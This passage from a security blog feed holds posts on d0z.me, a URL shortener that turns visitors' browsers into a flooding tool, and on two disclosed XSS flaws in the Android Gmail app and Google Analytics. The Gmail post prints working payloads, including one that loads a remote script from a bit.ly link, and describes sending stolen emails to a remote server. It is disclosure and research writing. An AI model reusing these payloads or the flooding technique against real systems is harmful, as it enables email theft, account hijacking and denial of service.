must receive the overly large requests, and thereby slowing down
response times drastically.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="f-ckin-cors-how-does-it-work"&gt;
&lt;h3&gt;F*ckin' CORS, How Does It Work?&lt;/h3&gt;
&lt;p&gt;So what hosts does this affect, you might ask? Just CORS enabled hosts,
right? Wrong.&lt;/p&gt;
&lt;p&gt;The &lt;a class="reference external" href="http://www.w3.org/TR/cors/"&gt;CORS working draft&lt;/a&gt; defines a series of steps that a browser
should go through when attempting to make a cross origin request. First,
it should check its cache to see if it has previously connected to this
URL within the cache timeout period, and if it has, whether or not cross
origin requests were allowed on that URL. If it was allowed, it can go
ahead and make the request; if not, the request process should stop
there. If, however, the URL is not in the cache, then the draft states
that the browser should make a &amp;quot;pre-flight request&amp;quot;, which is
essentially an empty request that seeks to get the headers for that
particular URL (see OPTIONS request). The exception to this rule,
however, is if the request is a &amp;quot;simple request&amp;quot;, i.e. a GET, HEAD, or
POST request.&lt;/p&gt;
&lt;p&gt;This means that rather than respecting all that silly &amp;quot;pre-flight
request&amp;quot; nonsense when Javascript attempts to make a simple method
cross-origin request, the browser can decide to simply forward the
request along with whatever data was attached to it. That's right! We
can send arbitrary POST data to arbitrary hosts as fast as the network
allows. Clearly, this attack could pretty quickly inundate a host or
cause its owner significant bandwidth charges. This is not at all out of
reach of even small Twitter spam campaigns, and a hacked ad network
could rival the power of the largest botnets. Judging from some of the
traffic spikes I've seen in my few months with d0z.me (~300,000 hits one
week), one could fairly easy gather the amount of traffic necessary to
bring down sizable websites.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="final-notes"&gt;
&lt;h2&gt;Final Notes&lt;/h2&gt;
&lt;p&gt;I considered adding HTTP referrer / origin obfuscation support, which I
&lt;a class="reference external" href="https://spareclockcycles.org/2010/12/22/follow-up-on-d0z-me-some-thoughts/"&gt;previously demonstrated was possible&lt;/a&gt;. However, as my goal is not to
make d0z.me impossible to detect and block, and I still wanted people to
be able to find the site if abuse occurs, I decided against doing so. I
think it is sufficient that I have warned multiple times against using
that to block attacks. It's a band-aid, not a fix. I also considered
adding IE support, but the attack is significantly slower without the
benefit of web workers. When IE adds support for web workers, I will
attempt to add support for it.&lt;/p&gt;
&lt;p&gt;I have left GET requests in as an option, although I believe that it is
usually a less effective one. However, it may be better to use such an
attack if a host disallows all POST requests, or if a.) CORS is enabled
on the URL and b.) responding to that request causes the host to do a
significant amount of processing. The GET attack also uses significantly
less memory on machines viewing the link, which might be a consideration
in some instances.&lt;/p&gt;
&lt;p&gt;As I said earlier, it's been three months since I released d0z.me. As
far as I can tell, all it has achieved is &lt;a class="reference external" href="https://spareclockcycles.org/2011/03/18/doz-me-taken-down/"&gt;a GTFO message from
Dreamhost&lt;/a&gt; and a decent number of complaint emails. I do like to think
that it has raised awareness of some of the problems with URL
shortnerers and HTML5, but no browsers have attempted to limit the
number of XHRs that can be made in a given time period (except *maybe*
Safari?), and no changes have been made to the CORS working draft. This
needs to be fixed.&lt;/p&gt;
&lt;p&gt;While I do find a lot of the issues involved here interesting, my main
reason in making this new release is to again encourage browser
developers and those working on the CORS draft to fix this problem, and
do it quickly. I hope it will also be useful for administrators to gauge
their systems' susceptibility to these attacks, as well as to come up
with defenses against them.&lt;/p&gt;
&lt;p&gt;As always, I certainly welcome any constructive criticisms or advice.
PHP/Javascript is not my forte, as I'm positive is obvious in the code,
so any tips from you gurus out there are much appreciated.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="d0z.me"></category><category term="ddos"></category><category term="html5"></category></entry><entry><title>d0z.me Taken Down</title><link href="https://spareclockcycles.org/2011/03/18/doz-me-taken-down.html" rel="alternate"></link><updated>2011-03-18T00:57:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-03-18:2011/03/18/doz-me-taken-down.html</id><summary type="html">&lt;div class="line-block"&gt;
&lt;div class="line"&gt;This was not what was supposed to get posted this week, but sadly, this is what my time got spent on. From the &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt; main page:&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Hey all,
Dreamhost informed me today that they received complaints regarding
&lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt;, which was not wholly unexpected. I would certainly have
appreciated it if the complaints had been forwarded to me, so that I
could take appropriate action; however, this did not occur. Dreamhost
also proceeded to notify me that d0z.me, as-is, violates their terms of
service. Unless I was willing to &amp;quot;ensure that (my) site can't be used to
actually DoS anyone&amp;quot;, I was told that I needed to remove the offending
content altogether or risk having the account shut down permanently.
While I do appreciate them contacting me before completely disabling my
account, I still think that this stance is unwarranted.&lt;/p&gt;
&lt;p&gt;d0z.me was never intended to be used as an attack tool. Rather, it was
meant as a proof-of-concept that served to both illustrate the dangers
posed by URL shorteners and HTML5, as well as to give concerned parties
an easy way to test detection/mitigation techniques for the attack. I
have quickly and consistently responded to all abuse requests I
received, and ensured that offending links were removed. Of course, this
could not prevent all abuse, and some certainly occurred. However, I
still believe that d0z.me was and is simply a tool, one that could be
used for positive ends or malicious ones, and should not be banned
simply because it can be misused.&lt;/p&gt;
&lt;p&gt;Given the situation, I have decided to temporarily take down the site
while I search for a host that is more willing to stand up for its
customers. As such, don't expect it to reliably be up over the next few
days. I don't believe that any kind of artificial limitation on d0z.me's
abilities will help prevent these kinds of attacks; rather, they will
encourage small, lesser known sites to join the fray, making for a
nearly impossible game of whack-a-d0z.me that would put users at more
risk. While of course this will most likely happen with the site down as
well, I at least will not have to waste my time crippling my code just
for that to occur.&lt;/p&gt;
&lt;p&gt;If you or someone you know would be willing to host d0z.me
permanently, please let me know at supernothing 4T spareclockcycles D0T
org. Feel free to &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/dosme.tar.gz"&gt;grab the code here&lt;/a&gt; and start your own version of
d0z.me as well, and help demonstrate the futility of censoring this
site. Whether or not I find a new host, I will continue making updates
to the d0z.me code, which will be posted on &lt;a class="reference external" href="https://spareclockcycles.org"&gt;my blog&lt;/a&gt;. I am currently
sidetracked a bit by this issue, but I have been working on definite
improvements that I will be releasing soon.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Until then, &lt;a class="reference external" href="http://twitter.com/#!/_supernothing"&gt;follow me on Twitter for updates&lt;/a&gt;.&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Peace,&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Ben Schmidt (supernothing)&lt;/div&gt;
&lt;div class="line"&gt;&lt;a class="reference external" href="https://spareclockcycles.org"&gt;https://spareclockcycles.org&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;EDIT: After looking through some hosting providers, I have temporarily
moved d0z.me to &lt;a class="reference external" href="https://nearlyfreespeech.net"&gt;nearlyfreespeech.net&lt;/a&gt; (thanks to &lt;a class="reference external" href="http://twitter.com/#!/piecritic"&gt;piecritic&lt;/a&gt; for
pointing it out). Hopefully they live up to their namesake and let it
be. We'll see how things go there, and I will move again if necessary.
If you can't get to it yet, it's because the DNS entries are still
propagating.&lt;/p&gt;
</summary><category term="censorship"></category><category term="d0z.me"></category><category term="ddos"></category><category term="hosting"></category></entry><entry><title>Android Gmail App: Stealing Emails via XSS</title><link href="https://spareclockcycles.org/2011/02/11/android-gmail-app-stealing-emails-via-xss.html" rel="alternate"></link><updated>2011-02-11T17:15:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-02-11:2011/02/11/android-gmail-app-stealing-emails-via-xss.html</id><summary type="html">&lt;p&gt;This post documents an XSS vulnerability that I discovered in the
default Gmail app (v1.3) provided by Google in Android 2.1 and prior.
All versions included in Android up to and including 2.1 seem to be
affected, but the bug was unintentionally patched in Froyo (2.2) when
Google updated the application to v2.3. The vulnerability let an
attacker execute arbitrary Javascript in a local context on the phone,
which made it possible to read the victim's emails (and the contacts
mentioned in those emails) off of the phone, download certain files to
phone (and open them), and more easily perform various other attacks
that have previously been documented to take further control of the
phone. Less seriously, it was also possible to crash the application
repeatedly, resulting in a denial-of-service situation. The flaw has now
been fixed via server-side patch to the Gmail API.&lt;/p&gt;
&lt;div class="section" id="discovery"&gt;
&lt;h2&gt;Discovery&lt;/h2&gt;
&lt;p&gt;During a night of drinking a couple months ago, I got into a discussion
with my roommate (&lt;a class="reference external" href="http://duststorm.org"&gt;his personal blog&lt;/a&gt;, cause I promised)&amp;nbsp;about what
characters are valid in email addresses. Although many filters only
allow [a-zA-Z0-9_-] plus maybe a few more as valid characters in the
local-part of the address, I was convinced that I had previously seen
email addresses that used characters outside of that character set, as
well as filters that allowed for a wider range of characters. As I
normally do during bouts of drinking, I immediately consulted the RFC to
settle the dispute (&lt;a class="reference external" href="http://tools.ietf.org/html/rfc5322"&gt;RFC 5322&lt;/a&gt;). Sure enough, it is apparently allowed,
but discouraged, under the RFC to have an email address in the following
format: &amp;quot;i&amp;lt;3whate\/er&amp;quot;&amp;#64;mydomain.com . As long as the quotation marks
are present, it is technically a valid email address.&lt;/p&gt;
&lt;p&gt;Seeing that this might trip up the ill-informed, I decided to see if
Gmail handled this case correctly. I wrote up a quick test in Python and
used one of the many open SMTP relays on campus (another rant for
another time) to shoot an email at my Gmail account. While the main
Gmail interface handled the problem with relative ease (there were some
small pattern matching issues when replying), I was a little surprised
to see something like the following when I opened the email on my phone:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_initial2.png"&gt;&lt;img alt="Android XSS Initial" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_initial2-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Clearly, there was an XSS vulnerability in the Gmail app. The root
cause, upon further investigation, was that the application was using
the raw source email address as an ID for the contact presence image
(the online/offline icon). An honest mistake, given the extremely
limited use of special characters in email addresses, but serious
nonetheless. To see if the issue affected all versions of Android, I
sent one to my roommate (who has Froyo), and one to my rather outdated
emulator running Android 1.5. The flaw was present in 1.5, but Froyo's
version was unaffected. I haven't tested on versions between 1.5 and
2.1, but I would assume that the bug has been present the entire time.
To prove that I could indeed execute Javascript, I first tried sending
an email with the following from address:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;window.location='http://google.com'&amp;lt;/script&amp;gt;&amp;quot;&amp;#64;somedmn.com&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;However, this email got blocked by Gmail's spam filters. Although at
first I thought that they might be aware of the vulnerability and had
tried to mitigate it, it quickly became apparent that it was simply
blocking all emails with &amp;quot;&amp;lt;&amp;quot; in the from address. Weird, but not a show
stopper. To get around this, I used the fact that the XSS was present in
the image tag and abused the onload attribute for execution:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;onload=window.location='http://google.com'&amp;quot;&amp;#64;somedmn.com&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;Sure enough, the email got through, and when viewed, I ended up looking
at Google!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_google.png"&gt;&lt;img alt="Android XSS Google" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_google-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="exploitation"&gt;
&lt;h2&gt;Exploitation&lt;/h2&gt;
&lt;p&gt;While redirecting to Google is fun and all, doing anything more
complicated required some work. Achieving arbitrary execution was
somewhat of a small challenge, given that the email address is limited
by the RFC to 254 characters in length, I could not use any &amp;quot;&amp;lt;&amp;quot; symbols
because of the Gmail filter, and, I could not use any quotation marks in
the actual Javascript. To complicate matters, a simple
document.write(&amp;quot;&amp;lt;script&amp;gt;window.location='&lt;a class="reference external" href="http://google.com"&gt;http://google.com&lt;/a&gt;'&amp;lt;/script&amp;gt;&amp;quot;)
didn't work in this situation. However, in spite of these things, I was
able to throw together a payload that updates the DOM correctly and
creates a script tag with a remote source, weighing in at ~225
characters with the domain attached.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Escaped:&lt;/div&gt;
&lt;div class="line"&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;onload='var&lt;/span&gt; f=String.fromCharCode;var d=document;var &lt;span class="pre"&gt;s=d.createElement(f(83,67,82,73,80,84));s.src=f(47,47,66,73,84,46,76,89,47,105,51,51,72,100,86);d.getElementsByTagName(f(72,69,65,68))[0].appendChild(s);'&lt;/span&gt; &amp;quot;&amp;#64;somedmn.com&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Unescaped:&lt;/div&gt;
&lt;div class="line"&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;onload='var&lt;/span&gt; d=document;var &lt;span class="pre"&gt;s=d.createElement(&amp;quot;SCRIPT&amp;quot;);s.src=&amp;quot;//BIT.LY/i33HdV&amp;quot;;d.getElementsByTagName(&amp;quot;HEAD&amp;quot;)[0].appendChild(s);'&lt;/span&gt; &amp;quot;&amp;#64;somedmn.com&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Of course, this is in all likelihood not the best way I could of done
this, but it worked well. I'd love to see better solutions if people
have them.&lt;/p&gt;
&lt;p&gt;EDIT: Here's a much cleaner and simpler version, courtesy of R (&lt;a class="reference external" href="https://spareclockcycles.org/2011/02/11/android-gmail-app-stealing-emails-via-xss/#comments"&gt;see
comments&lt;/a&gt;). I especially liked the use of an attribute for storing the
URL string.&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;title='http://bit.ly/i33HdV'&lt;/span&gt; &lt;span class="pre"&gt;onload='d=document;(s=d.createElement(/script/.source)).src=this.title;d.getElementsByTagName(/head/.source)[0].appendChild(s)'&lt;/span&gt; &amp;quot;&amp;#64;somedmn.com&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;With this in place, I could now do some more interesting things. First,
I dumped the page source so I could see better how exactly the
application worked. The Gmail app is closed source and the page is
dynamically generated in the Java code, so it was useful to get a dump
of that . I also grabbed the Gmail apk and unzipped it, which gave me
the Javascript API available to the application. I would provide this
code, but I don't want to get into any copyright issues by distributing
it here (it's pretty easy to get on your own, anyway). Finally, vaguely
following Thomas Cannon's wonderful guide on &lt;a class="reference external" href="http://thomascannon.net/projects/android-reversing/"&gt;Android reversing&lt;/a&gt;, I
decompiled the Java bytecode of the app to get a better idea of what I
might be able to do.&lt;/p&gt;
&lt;p&gt;Probably the easiest way to exploit this vulnerability would be simply
to launch a phishing attack that redirects users to a fake mobile Gmail
login page, in the hopes that they will happily log in to continue
viewing their emails. However, this was not a particularly interesting
or creative thing to do with the vulnerability, simple though it may be.&lt;/p&gt;
&lt;p&gt;After reading through some of the code, the main attack that jumped out
at me was to dump emails off the phone. Using some very simple
Javascript, one could simply grab all the emails on the phone and submit
them to a remote server. Doing things this way might not be practical in
a real attack though, given the time it would take to gather every email
on the device. A better technique is to utilize cross origin requests to
send each email as it's being queried, meaning that an attacker will get
the emails as soon as they're queried (&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/android_xss_steal.js"&gt;naive demo code here&lt;/a&gt;). To give
the attacker more time to gather emails, one could run the dumping code
while also doing something like periodically spamming the user with
requests to add a contact, giving the attack precious time to collect
more data. &amp;nbsp;Rather than dumping all the emails, though, a smarter use of
this exploit would be to reset a user's password to another service, and
then send an attack email soon afterwards. If the target opened it, we
could simply grab the last 2 or 3 emails and easily gain access to the
account we reset.&lt;/p&gt;
&lt;p&gt;In addition to the email dumping, some other interesting functions
caught my eye: download, preview, and showExternalResources. Although
not used anywhere in the script.js file that I grabbed from the apk
file, these methods were public in the decompiled Java API, meaning they
could be called via Javascript in the window. Using these functions with
the proper parameters, it was possible to download arbitrary files to
the phone without permission, cause external resources to be rendered,
and to automatically open various attached files (such as document
files). Obviously, all of these would provide an easy vector for various
attacks.&lt;/p&gt;
&lt;p&gt;Beyond these more serious problems, it was also possible to do various
odd things, like prompt the user to add a contact, set a label, open up
a new email to a target of our choosing, or automatically open up a
forward/reply message to an email. Overall though, the Javascript API in
the app did a fairly good job at preventing abuse, at least when
compared to platforms such as &lt;a class="reference external" href="http://www.eweek.com/c/a/Security/Researchers-Find-Security-Flaws-in-Palm-Smartphone-webOS-759999/"&gt;WebOS&lt;/a&gt;. I was unable in my tests to gain
unrestricted access to sending permissions or further compromise data on
the phone beyond the emails without using other vulnerabilities.&lt;/p&gt;
&lt;p&gt;One must also keep in mind that beyond these vulnerability-specific
threats, the flaw also allowed for much easier (and quieter)
exploitation of other vulnerabilities that have been found by other
researchers, including the &lt;a class="reference external" href="http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/"&gt;data-stealing bug&lt;/a&gt; and various arbitrary
code execution vulnerabilities in WebKit (like &lt;a class="reference external" href="http://www.exploit-db.com/exploits/15548/"&gt;this&lt;/a&gt;). It also allowed
for the exploitation of any number of file format bugs that might have
been found in the future. Exploiting any of these would be as easy as
getting a user to open up an email. Worse, the user would have no idea
until it was too late, as one could set the From header appropriately to
make the email look&amp;nbsp;legitimate (i.e., to something other than Test :P):&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_inbox2.png"&gt;&lt;img alt="Android XSS Inbox" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_inbox2-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And yes, that email executes arbitrary Javascript (shown here trying to
add the user &amp;quot;Test;--&amp;quot; to the contact list):&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_add_contact.png"&gt;&lt;img alt="Android XSS Add Contact" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_add_contact-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;I found the bug on 12/3/2010, and I contacted Google about 24 hours
after I discovered it and confirmed it was exploitable. I received a
quick initial response, but patching of the vulnerability on the server
side was not completed until 1/28/11, apparently because of decreased
staffing levels over the holiday. The patch was applied server-side in
the Gmail API, and works by converting the special characters into their
corresponding HTML entities. The Google security people were, as in all
my previous communications with them, polite and professional, and I
want to thank them for addressing the issue in a reasonable timeframe.&lt;/p&gt;
&lt;p&gt;Overall, it was a pretty interesting vulnerability, and it was a good
opportunity for me to learn a little more about Android. I had a good
time familiarizing myself with the platform, and hopefully I will be
able to do some more interesting things with it in the future. It has
also definitely made me think twice before I open emails on my phone,
which is probably for the best. Hopefully once these platforms become
more mature, we won't see as many of these simple but serious
vulnerabilities. However, if the maturation process we've observed in
other security domains is any indication, I wouldn't hold your breath.
It's going to take time.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Google Analytics XSS Vulnerability</title><link href="https://spareclockcycles.org/2011/02/03/google-analytics-xss-vulnerability.html" rel="alternate"></link><updated>2011-02-03T19:21:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-02-03:2011/02/03/google-analytics-xss-vulnerability.html</id><summary type="html">&lt;p&gt;This post documents an XSS vulnerability I discovered in the event
tracking functionality provided by Google Analytics. Given a website's
Google account number (which can be found in the site source), one could
spoof specially crafted events that, when clicked in the administrative
interface, would run arbitrary Javascript in the victim's browser. This
would allow an attacker to, among other things, hijack the account.
Although it did not affect as many users as the &lt;a class="reference external" href="https://spareclockcycles.org/2010/12/14/gmail-google-chrome-xss-vulnerability/"&gt;Gmail XSS
vulnerability&lt;/a&gt; did, it posed a significant risk to many site
administrators, who are prime targets for attack.&lt;/p&gt;
&lt;div class="section" id="vulnerability-discovery"&gt;
&lt;h2&gt;Vulnerability Discovery&lt;/h2&gt;
&lt;p&gt;Back when I &lt;a class="reference external" href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener/"&gt;released d0z.me&lt;/a&gt;, I realized that I had never set up
&lt;a class="reference external" href="http://code.google.com/apis/analytics/docs/tracking/eventTrackerGuide.html"&gt;event tracking&lt;/a&gt; for tarball downloads on my site. While getting this
configured, I got curious as to how well Google sanitized the incoming
data, given that a malicious user could arbitrarily define what events
would be sent and then presented to an administrator. I wrote up some
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/analytics_xss.js"&gt;incredibly simple Javascript&lt;/a&gt; that would send an XSS testing string in
the various fields provided by the event tracking API. After waiting a
few minutes for it to update in the Analytics interface, I inspected the
results.&lt;/p&gt;
&lt;p&gt;Sure enough, while double quotes and tag characters were escaped in the
corresponding link, single quotes were not. This would have been OK (the
rest of their js code uses double quotes religiously for strings), but
their use of Javascript link handlers and the need to pass an array of
strings made the problem exploitable:&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Good: &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;href=&amp;quot;event_object_detail?id=XXXXXXX&amp;amp;pdr=XXXXX-XXXX&amp;quot;&lt;/span&gt; &lt;span class="pre"&gt;onclick=&amp;quot;whatever_needs_doing()&amp;quot;&lt;/span&gt;&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Bad: &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;href=&amp;quot;javascript:analytics.PropertyManager._getInstance()._broadcastChange('events_bar_detail',&lt;/span&gt; ['type', &lt;span class="pre"&gt;'location'+alert('xss')+'',&lt;/span&gt; &lt;span class="pre"&gt;'event_action'])&amp;quot;&lt;/span&gt;&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Interestingly, the Top Events section of the Event Handling page seems
to be the only place in the Analytics admin interface where Javascript
is called like this, which might have been part of the reason the
vulnerability existed. It also did not overtly break the page, which
might have kept testers from noticing. Getting into the Top Events
section is trivial, as one only has to loop the Javascript as much as
desired.&lt;/p&gt;
&lt;p&gt;In Action:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/02/analytics_xss_clean.png"&gt;&lt;img alt="Analytics XSS Demo" src="https://spareclockcycles.org/wp-content/uploads/2011/02/analytics_xss_clean-300x148.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Note that the malicious nature of the link is only obvious for
demonstration reasons. Simply putting a legitimate URL in front of the
malicious payload would hide it from the user.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;I contacted Google regarding the vulnerability on January 5th, with
relevant PoC code. They replied on the 6th, confirming the
vulnerability, and confirmed that a patch had been written and was being
tested on the 12th. On February 3rd, they confirmed their testing was
complete, and that the patch was in place. I confirmed with my own
tests, and then publicly disclosed. In addition, I was awarded $1000 for
the report. Not bad for a little bit of Javascript and poking around. :P&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="unrelated-blather"&gt;
&lt;h2&gt;Unrelated Blather&lt;/h2&gt;
&lt;p&gt;To those wondering where I've been the past month or so, I have been
busy IRL getting set up at grad school among many things. As this blog
is mainly to document the research and such that I am doing, the amount
I post is directly related to the time I have to mess with things. I
promise, updates to &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt; soon, as well as my first Android
vulnerability (yay!), and then whatever I feel like posting on after
that. It's good to be back!&lt;/p&gt;
&lt;/div&gt;
</summary><category term="google analytics"></category><category term="google reward program"></category><category term="vulnerability"></category><category term="xss"></category></entry><entry><title>Follow-up On d0z.me: Some Thoughts</title><link href="https://spareclockcycles.org/2010/12/22/follow-up-on-d0z-me-some-thoughts.html" rel="alternate"></link><updated>2010-12-22T16:17:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-22:2010/12/22/follow-up-on-d0z-me-some-thoughts.html</id><summary type="html">&lt;div class="section" id="security-bug-fixes"&gt;
&lt;h2&gt;Security/Bug Fixes&lt;/h2&gt;
&lt;p&gt;I'm a big believer in being up front and loud about security
vulnerabilities and software bugs that are found, so I wanted to first
and foremost tell anyone using the d0z.me source code to grab an
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/dosme.tar.gz"&gt;updated version&lt;/a&gt;. I have to apologize, as I really had not expected
this site to get anywhere near as popular as quickly as it did, and so I
had not spent a ton of time testing it before I put in production. This
is a sadly common mistake that the worst of us tend to fall into :-/ .
As such, one of the regexs I was using in a sanitize routine did not
function correctly, allowing for XSS and SQL injection with a specially
crafted URL. The hole was patched quickly, and no significant user data
was taken (as I keep none), but I wanted to make sure everyone knew in
case they're putting up their own versions. Props to the person on
Reddit who pointed out the flaw to me. I'm not sure who it was, as it
has since been deleted, but props all the same.&lt;/p&gt;
&lt;p&gt;Secondly, a minor bug, but a reader named Max pointed out that I had
mistyped a couple characters in my charset. Should have used Python -&amp;gt;
string.letters+string.digits, but oh well. Thanks for the report!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mitigation-techniques"&gt;
&lt;h2&gt;Mitigation Techniques&lt;/h2&gt;
&lt;p&gt;Now, onto happier / more interesting topics!&lt;/p&gt;
&lt;div class="section" id="dns-blocking"&gt;
&lt;h3&gt;DNS Blocking&lt;/h3&gt;
&lt;p&gt;An oldie, but goodie. Used to fight malware all the time, this would
mitigate malicious shorteners by simply by redirecting the user to a
warning page by changing the DNS entry. It was interesting to see that,
within a day of releasing d0z.me, it was already being blocked by
OpenDNS. Impressive response time, but given that it was posted all over
Slashdot and Reddit before it got blocked, I think the response time was
better than it usually is.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/opendns.png"&gt;&lt;img alt="OpenDNS blocking d0z.me" src="https://spareclockcycles.org/wp-content/uploads/2010/12/opendns-300x159.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I'm not going to spend much space discussing this one because, rather
obviously, this is not a feasible technique in the long run, as it
hasn't been particularly effective for malware either. Attackers can
easily register domains more quickly than they're being blocked, and not
all DNS providers provide such a defense for their users in the first
place. However, it is a decent first line of defense on the user's end,
and will at least block more popular and older malicious URL shorteners.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="http-referrer-mod-rewrite"&gt;
&lt;h3&gt;HTTP Referrer + mod_rewrite&lt;/h3&gt;
&lt;p&gt;Some smart people have been discussing the use of mod_rewrite (or
similar) to redirect based on HTTP referrers to block these attacks
(interested readers can find an excellent write-up at &lt;a class="reference external" href="http://jaymill.net/?p=46#more-46"&gt;jaymill.net&lt;/a&gt;).
Although it's an interesting approach that might deter the casual
attacker, I see a couple big problems with this.&lt;/p&gt;
&lt;p&gt;Firstly, it is absolutely trivial to make this attack function with a
whole host of different HTTP referrers, simply by hosting a couple
static files on more trusted domains. The HTTP referrer header and the
Origin header for HTML5 cross-origin requests is based off the the
source domain of the script location. To circumvent HTTP referrer
protections, one needs only to upload a small html file and a Javascript
file to Google Pages, Google App Engine, Amazon, etc, etc to give the
requests a new domain. I don't believe most sites would be OK with
blocking refers from a large number of these kinds of domains just to
avoid this attack, unless the attack was already underway and serious.
Also, the fact that such a large number of domains can be used means
that whoever is managing the site would have to keep track and enter
these rules for every single domain, which could become quite the
herculean task.&lt;/p&gt;
&lt;p&gt;I took the liberty of writing up a PoC demonstrating that, using a
hidden iframe, one can make attacks like d0z.me appear to have a
different referrer address (spareclockcycles.org). You can view it at
&lt;a class="reference external" href="http://d0z.me/poc_refer.html"&gt;http://d0z.me/poc_refer.html&lt;/a&gt; (note: this link attacks example.com, which
should be local). If you look at the requests in Wireshark, you can see
that the Origin and HTTP Referrer headers are set to
spareclockcycles.org and spareclockcycles.org/evil.html respectively.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-4.png"&gt;&lt;img alt="Wireshark capture" src="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-4-300x178.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This was tested with both Firefox and Chrome, and this behavior conforms
with what the &lt;a class="reference external" href="http://www.w3.org/TR/cors/"&gt;working draft&lt;/a&gt; has to say on the topic. Some browsers
might be non-compliant, but the big two apparently aren't.&lt;/p&gt;
&lt;p&gt;Secondly, while this mitigates the attack somewhat, it simply raises the
bar of how many users an attacker needs to recruit through clicks on
malicious links. Enough traffic will still overwhelm the server, as
valid connections are still being fully established, and some level of
processing still has to be done on their requests.&lt;/p&gt;
&lt;p&gt;I believe that Jeremy mentioned both of these issues, to some degree, in
his post, and seemed to believe that both were of small enough concern
that it doesn't really matter. I have to respectfully disagree on that
point, however. I think that yes, it raises the bar slightly for an
attacker, but in the long run proves very little hindrance to one with
any level of technical ability. It is certainly a good recommendation
for those currently under an attack; however, I think a more solid
approach is needed to dealing with this issue in the long run, and that
we need to eventually address it with a complete solution rather than
with temporary band-aids.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="changing-cross-origin-requests-standards"&gt;
&lt;h3&gt;Changing Cross-Origin Requests Standards&lt;/h3&gt;
&lt;p&gt;It is clear to me that this problem is going to have to be fixed with
modifications on both ends, servers and browsers alike, if we want a
